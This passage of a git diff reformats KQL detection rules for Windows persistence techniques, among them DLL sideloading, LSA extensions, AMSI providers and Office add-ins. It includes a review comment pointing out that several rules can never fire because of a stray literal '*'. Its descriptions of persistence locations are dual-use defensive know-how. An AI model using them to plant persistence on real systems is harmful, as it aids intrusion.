-// Description: Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
-// False Positives:
-// - Unlikely
-
-DeviceImageLoadEvents
+// Title: Potential Mfdetours.DLL Sideloading
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-03
+// Level: medium
+// Description: Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
 | where FolderPath endswith "\\mfdetours.dll" and (not(FolderPath contains ":\\Program Files (x86)\\Windows Kits\\10\\bin\\"))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_persistence_attempt_via_errorhandler_cmd.kql b/KQL/rules/Persistence/potential_persistence_attempt_via_errorhandler_cmd.kql
index c3a246da..665e7534 100644
--- a/KQL/rules/Persistence/potential_persistence_attempt_via_errorhandler_cmd.kql
+++ b/KQL/rules/Persistence/potential_persistence_attempt_via_errorhandler_cmd.kql
@@ -1,11 +1,11 @@
-// Title: Potential Persistence Attempt Via ErrorHandler.Cmd
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-09
-// Level: medium
-// Description: Detects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory which could be used as a method of persistence
-// The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence
-
-DeviceFileEvents
+// Title: Potential Persistence Attempt Via ErrorHandler.Cmd
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-09
+// Level: medium
+// Description: Detects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory which could be used as a method of persistence
+// The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+
+DeviceFileEvents
 | where FolderPath endswith "\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_persistence_via_autodialdll.kql b/KQL/rules/Persistence/potential_persistence_via_autodialdll.kql
index 6b5a2e4b..fb66964c 100644
--- a/KQL/rules/Persistence/potential_persistence_via_autodialdll.kql
+++ b/KQL/rules/Persistence/potential_persistence_via_autodialdll.kql
@@ -1,12 +1,12 @@
-// Title: Potential Persistence Via AutodialDLL
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-10
-// Level: high
-// Description: Detects change the the "AutodialDLL" key which could be used as a persistence method to load custom DLL via the "ws2_32" library
-// MITRE Tactic: Persistence
-// Tags: attack.persistence
-// False Positives:
-// - Unlikely
-
-DeviceRegistryEvents
+// Title: Potential Persistence Via AutodialDLL
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-10
+// Level: high
+// Description: Detects change the the "AutodialDLL" key which could be used as a persistence method to load custom DLL via the "ws2_32" library
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
 | where RegistryKey contains "\\Services\\WinSock2\\Parameters\\AutodialDLL"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_persistence_via_chm_helper_dll.kql b/KQL/rules/Persistence/potential_persistence_via_chm_helper_dll.kql
index 3ea63ef9..c84b186a 100644
--- a/KQL/rules/Persistence/potential_persistence_via_chm_helper_dll.kql
+++ b/KQL/rules/Persistence/potential_persistence_via_chm_helper_dll.kql
@@ -1,10 +1,10 @@
-// Title: Potential Persistence Via CHM Helper DLL
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-07-21
-// Level: high
-// Description: Detects when an attacker modifies the registry key "HtmlHelp Author" to achieve persistence
-// MITRE Tactic: Persistence
-// Tags: attack.persistence
-
-DeviceRegistryEvents
+// Title: Potential Persistence Via CHM Helper DLL
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects when an attacker modifies the registry key "HtmlHelp Author" to achieve persistence
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+
+DeviceRegistryEvents
 | where RegistryKey contains "\\Software\\Microsoft\\HtmlHelp Author\\Location" or RegistryKey contains "\\Software\\WOW6432Node\\Microsoft\\HtmlHelp Author\\Location"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_persistence_via_custom_protocol_handler.kql b/KQL/rules/Persistence/potential_persistence_via_custom_protocol_handler.kql
index 02f63428..9b799adf 100644
--- a/KQL/rules/Persistence/potential_persistence_via_custom_protocol_handler.kql
+++ b/KQL/rules/Persistence/potential_persistence_via_custom_protocol_handler.kql
@@ -1,12 +1,12 @@
-// Title: Potential Persistence Via Custom Protocol Handler
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-05-30
-// Level: medium
-// Description: Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-// False Positives:
-// - Many legitimate applications can register a new custom protocol handler. Additional filters needs to applied according to your environment.
-
-DeviceRegistryEvents
+// Title: Potential Persistence Via Custom Protocol Handler
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-05-30
+// Level: medium
+// Description: Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+// - Many legitimate applications can register a new custom protocol handler. Additional filters needs to applied according to your environment.
+
+DeviceRegistryEvents
 | where (RegistryValueData startswith "URL:" and RegistryKey =~ "HKEY_LOCAL_MACHINE\\CLASSES*") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\") or RegistryValueData startswith "URL:ms-")))
\ No newline at end of file
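Review bot: `RegistryKey =~ "HKEY_LOCAL_MACHINE\\CLASSES*"` can never be true: `=~` is case-insensitive equality in KQL and `*` is an ordinary character, not a wildcard, so the rule's only positive key condition is dead and the rule never alerts. The trailing `*` looks like an untranslated wildcard from the conversion; the predicate should be a prefix test without it, e.g. `RegistryKey startswith "HKEY_LOCAL_MACHINE\\..."` with the exact prefix checked against how DeviceRegistryEvents renders keys under the Classes hive before relying on it. The same literal-`*` artifact appears in the later hunks on this page: `RegistryKey endswith "...\\VolumeCaches*"` (disk cleanup handler), `RegistryKey endswith "...\\ContentIndex\\Language*"` (DLLPathOverride), `RegistryValueData =~ "-url hcp://services/centers/support*topic=%%s"` (Event Viewer Events.asp, where the doubled `%%` also looks like an escaping artifact to confirm against the real value) and `RegistryKey endswith "Software\\Microsoft\\Office*"` (Excel add-in); each `endswith "...*"` should become `contains` without the `*`. These lines are unchanged context in whitespace-only hunks, so the rules were already broken before this commit, but since the files appear to be generated the fix presumably belongs in the conversion script rather than in the .kql output.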
diff --git a/KQL/rules/Persistence/potential_persistence_via_disk_cleanup_handler_registry.kql b/KQL/rules/Persistence/potential_persistence_via_disk_cleanup_handler_registry.kql
index ff0b870a..fdb9d7c1 100644
--- a/KQL/rules/Persistence/potential_persistence_via_disk_cleanup_handler_registry.kql
+++ b/KQL/rules/Persistence/potential_persistence_via_disk_cleanup_handler_registry.kql
@@ -1,17 +1,17 @@
-// Title: Potential Persistence Via Disk Cleanup Handler - Registry
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-07-21
-// Level: medium
-// Description: Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.
-// The disk cleanup manager is part of the operating system. It displays the dialog box […]
-// The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.
-// Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.
-// Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.
-// Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence
-// False Positives:
-// - Legitimate new entry added by windows
-
-DeviceRegistryEvents
+// Title: Potential Persistence Via Disk Cleanup Handler - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: medium
+// Description: Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence.
+// The disk cleanup manager is part of the operating system. It displays the dialog box […]
+// The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.
+// Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.
+// Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. 
+// Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Legitimate new entry added by windows
+
+DeviceRegistryEvents
 | where (ActionType =~ "RegistryKeyCreated" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\VolumeCaches*") and (not((RegistryKey endswith "\\Active Setup Temp Folders" or RegistryKey endswith "\\BranchCache" or RegistryKey endswith "\\Content Indexer Cleaner" or RegistryKey endswith "\\D3D Shader Cache" or RegistryKey endswith "\\Delivery Optimization Files" or RegistryKey endswith "\\Device Driver Packages" or RegistryKey endswith "\\Diagnostic Data Viewer database files" or RegistryKey endswith "\\Downloaded Program Files" or RegistryKey endswith "\\DownloadsFolder" or RegistryKey endswith "\\Feedback Hub Archive log files" or RegistryKey endswith "\\Internet Cache Files" or RegistryKey endswith "\\Language Pack" or RegistryKey endswith "\\Microsoft Office Temp Files" or RegistryKey endswith "\\Offline Pages Files" or RegistryKey endswith "\\Old ChkDsk Files" or RegistryKey endswith "\\Previous Installations" or RegistryKey endswith "\\Recycle Bin" or RegistryKey endswith "\\RetailDemo Offline Content" or RegistryKey endswith "\\Setup Log Files" or RegistryKey endswith "\\System error memory dump files" or RegistryKey endswith "\\System error minidump files" or RegistryKey endswith "\\Temporary Files" or RegistryKey endswith "\\Temporary Setup Files" or RegistryKey endswith "\\Temporary Sync Files" or RegistryKey endswith "\\Thumbnail Cache" or RegistryKey endswith "\\Update Cleanup" or RegistryKey endswith "\\Upgrade Discarded Files" or RegistryKey endswith "\\User file versions" or RegistryKey endswith "\\Windows Defender" or RegistryKey endswith "\\Windows Error Reporting Files" or RegistryKey endswith "\\Windows ESD installation files" or RegistryKey endswith 
"\\Windows Upgrade Log Files")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_persistence_via_dllpathoverride.kql b/KQL/rules/Persistence/potential_persistence_via_dllpathoverride.kql
index 5ab794a6..47c8c3f1 100644
--- a/KQL/rules/Persistence/potential_persistence_via_dllpathoverride.kql
+++ b/KQL/rules/Persistence/potential_persistence_via_dllpathoverride.kql
@@ -1,10 +1,10 @@
-// Title: Potential Persistence Via DLLPathOverride
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-07-21
-// Level: high
-// Description: Detects when an attacker adds a new "DLLPathOverride" value to the "Natural Language" key in order to achieve persistence which will get invoked by "SearchIndexer.exe" process
-// MITRE Tactic: Persistence
-// Tags: attack.persistence
-
-DeviceRegistryEvents
+// Title: Potential Persistence Via DLLPathOverride
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects when an attacker adds a new "DLLPathOverride" value to the "Natural Language" key in order to achieve persistence which will get invoked by "SearchIndexer.exe" process
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\SYSTEM\\CurrentControlSet\\Control\\ContentIndex\\Language*" and (RegistryKey contains "\\StemmerDLLPathOverride" or RegistryKey contains "\\WBDLLPathOverride" or RegistryKey contains "\\StemmerClass" or RegistryKey contains "\\WBreakerClass")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_persistence_via_event_viewer_events_asp.kql b/KQL/rules/Persistence/potential_persistence_via_event_viewer_events_asp.kql
index 9bf56e81..05844b1f 100644
--- a/KQL/rules/Persistence/potential_persistence_via_event_viewer_events_asp.kql
+++ b/KQL/rules/Persistence/potential_persistence_via_event_viewer_events_asp.kql
@@ -1,10 +1,10 @@
-// Title: Potential Persistence Via Event Viewer Events.asp
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-02-17
-// Level: medium
-// Description: Detects potential registry persistence technique using the Event Viewer "Events.asp" technique
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.defense-evasion, attack.t1112
-
-DeviceRegistryEvents
+// Title: Potential Persistence Via Event Viewer Events.asp
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-17
+// Level: medium
+// Description: Detects potential registry persistence technique using the Event Viewer "Events.asp" technique
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+
+DeviceRegistryEvents
 | where (RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgram" or RegistryKey contains "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionURL") and (not((RegistryValueData =~ "(Empty)" or (RegistryValueData =~ "%%SystemRoot%%\\PCHealth\\HelpCtr\\Binaries\\HelpCtr.exe" and InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\svchost.exe" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgram") or (RegistryValueData =~ "-url hcp://services/centers/support*topic=%%s" and InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\svchost.exe" and RegistryKey endswith "\\Microsoft\\Windows NT\\CurrentVersion\\Event Viewer\\MicrosoftRedirectionProgramCommandLineParameters") or RegistryValueData =~ "http://go.microsoft.com/fwlink/events.asp")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_persistence_via_excel_add_in_registry.kql b/KQL/rules/Persistence/potential_persistence_via_excel_add_in_registry.kql
index 16167834..c76d6bf9 100644
--- a/KQL/rules/Persistence/potential_persistence_via_excel_add_in_registry.kql
+++ b/KQL/rules/Persistence/potential_persistence_via_excel_add_in_registry.kql
@@ -1,10 +1,10 @@
-// Title: Potential Persistence Via Excel Add-in - Registry
-// Author: frack113
-// Date: 2023-01-15
-// Level: high
-// Description: Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.t1137.006
-
-DeviceRegistryEvents
+// Title: Potential Persistence Via Excel Add-in - Registry
+// Author: frack113
+// Date: 2023-01-15
+// Level: high
+// Description: Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1137.006
+
+DeviceRegistryEvents
 | where RegistryValueData endswith ".xll" and RegistryValueData startswith "/R " and RegistryKey endswith "Software\\Microsoft\\Office*" and RegistryKey endswith "\\Excel\\Options"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_persistence_via_lsa_extensions.kql b/KQL/rules/Persistence/potential_persistence_via_lsa_extensions.kql
index 77025f5f..b86ff662 100644
--- a/KQL/rules/Persistence/potential_persistence_via_lsa_extensions.kql
+++ b/KQL/rules/Persistence/potential_persistence_via_lsa_extensions.kql
@@ -1,13 +1,13 @@
-// Title: Potential Persistence Via LSA Extensions
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-07-21
-// Level: high
-// Description: Detects when an attacker modifies the "REG_MULTI_SZ" value named "Extensions" to include a custom DLL to achieve persistence via lsass.
-// The "Extensions" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence
-// False Positives:
-// - Unlikely
-
-DeviceRegistryEvents
+// Title: Potential Persistence Via LSA Extensions
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects when an attacker modifies the "REG_MULTI_SZ" value named "Extensions" to include a custom DLL to achieve persistence via lsass.
+// The "Extensions" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
 | where RegistryKey contains "\\SYSTEM\\CurrentControlSet\\Control\\LsaExtensionConfig\\LsaSrv\\Extensions"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_persistence_via_microsoft_office_add_in.kql b/KQL/rules/Persistence/potential_persistence_via_microsoft_office_add_in.kql
index 52afb24c..2730248f 100644
--- a/KQL/rules/Persistence/potential_persistence_via_microsoft_office_add_in.kql
+++ b/KQL/rules/Persistence/potential_persistence_via_microsoft_office_add_in.kql
@@ -1,12 +1,12 @@
-// Title: Potential Persistence Via Microsoft Office Add-In
-// Author: NVISO
-// Date: 2020-05-11
-// Level: high
-// Description: Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.t1137.006
-// False Positives:
-// - Legitimate add-ins
-
-DeviceFileEvents
+// Title: Potential Persistence Via Microsoft Office Add-In
+// Author: NVISO
+// Date: 2020-05-11
+// Level: high
+// Description: Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1137.006
+// False Positives:
+// - Legitimate add-ins
+
+DeviceFileEvents
 | where (FolderPath contains "\\Microsoft\\Addins\\" and (FolderPath endswith ".xlam" or FolderPath endswith ".xla" or FolderPath endswith ".ppam")) or (FolderPath contains "\\Microsoft\\Word\\Startup\\" and FolderPath endswith ".wll") or (FolderPath contains "Microsoft\\Excel\\XLSTART\\" and FolderPath endswith ".xlam") or (FolderPath contains "\\Microsoft\\Excel\\Startup\\" and FolderPath endswith ".xll")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_persistence_via_microsoft_office_startup_folder.kql b/KQL/rules/Persistence/potential_persistence_via_microsoft_office_startup_folder.kql
index 5313eb2b..ec09b020 100644
--- a/KQL/rules/Persistence/potential_persistence_via_microsoft_office_startup_folder.kql
+++ b/KQL/rules/Persistence/potential_persistence_via_microsoft_office_startup_folder.kql
@@ -1,13 +1,13 @@
-// Title: Potential Persistence Via Microsoft Office Startup Folder
-// Author: Max Altgelt (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-06-02
-// Level: high
-// Description: Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence.
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.t1137
-// False Positives:
-// - Loading a user environment from a backup or a domain controller
-// - Synchronization of templates
-
-DeviceFileEvents
+// Title: Potential Persistence Via Microsoft Office Startup Folder
+// Author: Max Altgelt (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-02
+// Level: high
+// Description: Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1137
+// False Positives:
+// - Loading a user environment from a backup or a domain controller
+// - Synchronization of templates
+
+DeviceFileEvents
 | where (((FolderPath endswith ".doc" or FolderPath endswith ".docm" or FolderPath endswith ".docx" or FolderPath endswith ".dot" or FolderPath endswith ".dotm" or FolderPath endswith ".rtf") and (FolderPath contains "\\Microsoft\\Word\\STARTUP" or (FolderPath contains "\\Office" and FolderPath contains "\\Program Files" and FolderPath contains "\\STARTUP"))) or ((FolderPath endswith ".xls" or FolderPath endswith ".xlsm" or FolderPath endswith ".xlsx" or FolderPath endswith ".xlt" or FolderPath endswith ".xltm") and (FolderPath contains "\\Microsoft\\Excel\\XLSTART" or (FolderPath contains "\\Office" and FolderPath contains "\\Program Files" and FolderPath contains "\\XLSTART")))) and (not((InitiatingProcessFolderPath endswith "\\WINWORD.exe" or InitiatingProcessFolderPath endswith "\\EXCEL.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_persistence_via_mpnotify.kql b/KQL/rules/Persistence/potential_persistence_via_mpnotify.kql
index 0674aea0..f6314db4 100644
--- a/KQL/rules/Persistence/potential_persistence_via_mpnotify.kql
+++ b/KQL/rules/Persistence/potential_persistence_via_mpnotify.kql
@@ -1,12 +1,12 @@
-// Title: Potential Persistence Via Mpnotify
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-07-21
-// Level: high
-// Description: Detects when an attacker register a new SIP provider for persistence and defense evasion
-// MITRE Tactic: Persistence
-// Tags: attack.persistence
-// False Positives:
-// - Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way
-
-DeviceRegistryEvents
+// Title: Potential Persistence Via Mpnotify
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects when an attacker register a new SIP provider for persistence and defense evasion
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way
+
+DeviceRegistryEvents
 | where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\mpnotify"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_persistence_via_mycomputer_registry_keys.kql b/KQL/rules/Persistence/potential_persistence_via_mycomputer_registry_keys.kql
index c7ae5b66..015717af 100644
--- a/KQL/rules/Persistence/potential_persistence_via_mycomputer_registry_keys.kql
+++ b/KQL/rules/Persistence/potential_persistence_via_mycomputer_registry_keys.kql
@@ -1,12 +1,12 @@
-// Title: Potential Persistence Via MyComputer Registry Keys
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-09
-// Level: high
-// Description: Detects modification to the "Default" value of the "MyComputer" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)
-// MITRE Tactic: Persistence
-// Tags: attack.persistence
-// False Positives:
-// - Unlikely but if you experience FPs add specific processes and locations you would like to monitor for
-
-DeviceRegistryEvents
+// Title: Potential Persistence Via MyComputer Registry Keys
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-09
+// Level: high
+// Description: Detects modification to the "Default" value of the "MyComputer" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Unlikely but if you experience FPs add specific processes and locations you would like to monitor for
+
+DeviceRegistryEvents
 | where RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer" and RegistryKey endswith "(Default)"
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_persistence_via_new_amsi_providers_registry.kql b/KQL/rules/Persistence/potential_persistence_via_new_amsi_providers_registry.kql
index c225fb44..7b921e94 100644
--- a/KQL/rules/Persistence/potential_persistence_via_new_amsi_providers_registry.kql
+++ b/KQL/rules/Persistence/potential_persistence_via_new_amsi_providers_registry.kql
@@ -1,12 +1,12 @@
-// Title: Potential Persistence Via New AMSI Providers - Registry
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-07-21
-// Level: high
-// Description: Detects when an attacker registers a new AMSI provider in order to achieve persistence
-// MITRE Tactic: Persistence
-// Tags: attack.persistence
-// False Positives:
-// - Legitimate security products adding their own AMSI providers. Filter these according to your environment
-
-DeviceRegistryEvents
+// Title: Potential Persistence Via New AMSI Providers - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-21
+// Level: high
+// Description: Detects when an attacker registers a new AMSI provider in order to achieve persistence
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Legitimate security products adding their own AMSI providers. Filter these according to your environment
+
+DeviceRegistryEvents
 | where (ActionType =~ "RegistryKeyCreated" and (RegistryKey endswith "\\SOFTWARE\\Microsoft\\AMSI\\Providers*" or RegistryKey endswith "\\SOFTWARE\\WOW6432Node\\Microsoft\\AMSI\\Providers*")) and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\")))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_persistence_via_notepad_plugins.kql b/KQL/rules/Persistence/potential_persistence_via_notepad_plugins.kql
index 5165e101..7350a916 100644
--- a/KQL/rules/Persistence/potential_persistence_via_notepad_plugins.kql
+++ b/KQL/rules/Persistence/potential_persistence_via_notepad_plugins.kql
@@ -1,13 +1,13 @@
-// Title: Potential Persistence Via Notepad++ Plugins
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-06-10
-// Level: medium
-// Description: Detects creation of new ".dll" files inside the plugins directory of a notepad++ installation by a process other than "gup.exe". Which could indicates possible persistence
-// MITRE Tactic: Persistence
-// Tags: attack.persistence
-// False Positives:
-// - Possible FPs during first installation of Notepad++
-// - Legitimate use of custom plugins by users in order to enhance notepad++ functionalities
-
-DeviceFileEvents
+// Title: Potential Persistence Via Notepad++ Plugins
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-10
+// Level: medium
+// Description: Detects creation of new ".dll" files inside the plugins directory of a notepad++ installation by a process other than "gup.exe". Which could indicates possible persistence
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Possible FPs during first installation of Notepad++
+// - Legitimate use of custom plugins by users in order to enhance notepad++ functionalities
+
+DeviceFileEvents
 | where (FolderPath contains "\\Notepad++\\plugins\\" and FolderPath endswith ".dll") and (not((InitiatingProcessFolderPath endswith "\\Notepad++\\updater\\gup.exe" or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" and (InitiatingProcessFolderPath endswith "\\target.exe" or InitiatingProcessFolderPath endswith "Installer.x64.exe") and InitiatingProcessFolderPath startswith "C:\\Users\\") or (InitiatingProcessFolderPath contains "\\npp." and InitiatingProcessFolderPath endswith ".exe" and (FolderPath in~ ("C:\\Program Files\\Notepad++\\plugins\\NppExport\\NppExport.dll", "C:\\Program Files\\Notepad++\\plugins\\mimeTools\\mimeTools.dll", "C:\\Program Files\\Notepad++\\plugins\\NppConverter\\NppConverter.dll", "C:\\Program Files\\Notepad++\\plugins\\Config\\nppPluginList.dll"))))))
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_persistence_via_outlook_form.kql b/KQL/rules/Persistence/potential_persistence_via_outlook_form.kql
index 13afbc05..47dd212e 100644
--- a/KQL/rules/Persistence/potential_persistence_via_outlook_form.kql
+++ b/KQL/rules/Persistence/potential_persistence_via_outlook_form.kql
@@ -1,12 +1,12 @@
-// Title: Potential Persistence Via Outlook Form
-// Author: Tobias Michalski (Nextron Systems)
-// Date: 2021-06-10
-// Level: high
-// Description: Detects the creation of a new Outlook form which can contain malicious code
-// MITRE Tactic: Persistence
-// Tags: attack.persistence, attack.t1137.003
-// False Positives:
-// - Legitimate use of outlook forms
-
-DeviceFileEvents
+// Title: Potential Persistence Via Outlook Form
+// Author: Tobias Michalski (Nextron Systems)
+// Date: 2021-06-10
+// Level: high
+// Description: Detects the creation of a new Outlook form which can contain malicious code
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1137.003
+// False Positives:
+// - Legitimate use of outlook forms
+
+DeviceFileEvents
 | where InitiatingProcessFolderPath endswith "\\outlook.exe" and (FolderPath contains "\\AppData\\Local\\Microsoft\\FORMS\\IPM" or FolderPath contains "\\Local Settings\\Application Data\\Microsoft\\Forms")
\ No newline at end of file
diff --git a/KQL/rules/Persistence/potential_persistence_via_typedpaths.kql b/KQL/rules/Persistence/potential_persistence_via_typedpaths.kql
index b561b52f..519f52b7 100644
--- a/KQL/rules/Persistence/potential_persistence_via_typedpaths.kql
+++ b/KQL/rules/Persistence/potential_persistence_via_typedpaths.kql
@@ -1,12 +1,12 @@
-// Title: Potential Persistence Via TypedPaths
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-22
-// Level: high
-// Description: Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt
-// MITRE Tactic: Persistence
-// Tags: attack.persistence
-// False Positives:
-// - Unlikely
-
-DeviceRegistryEvents
+// Title: Potential Persistence Via TypedPaths
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-22
+// Level: high
+// Description: Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt
+// MITRE Tactic: Persistence
+// Tags: attack.persistence
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
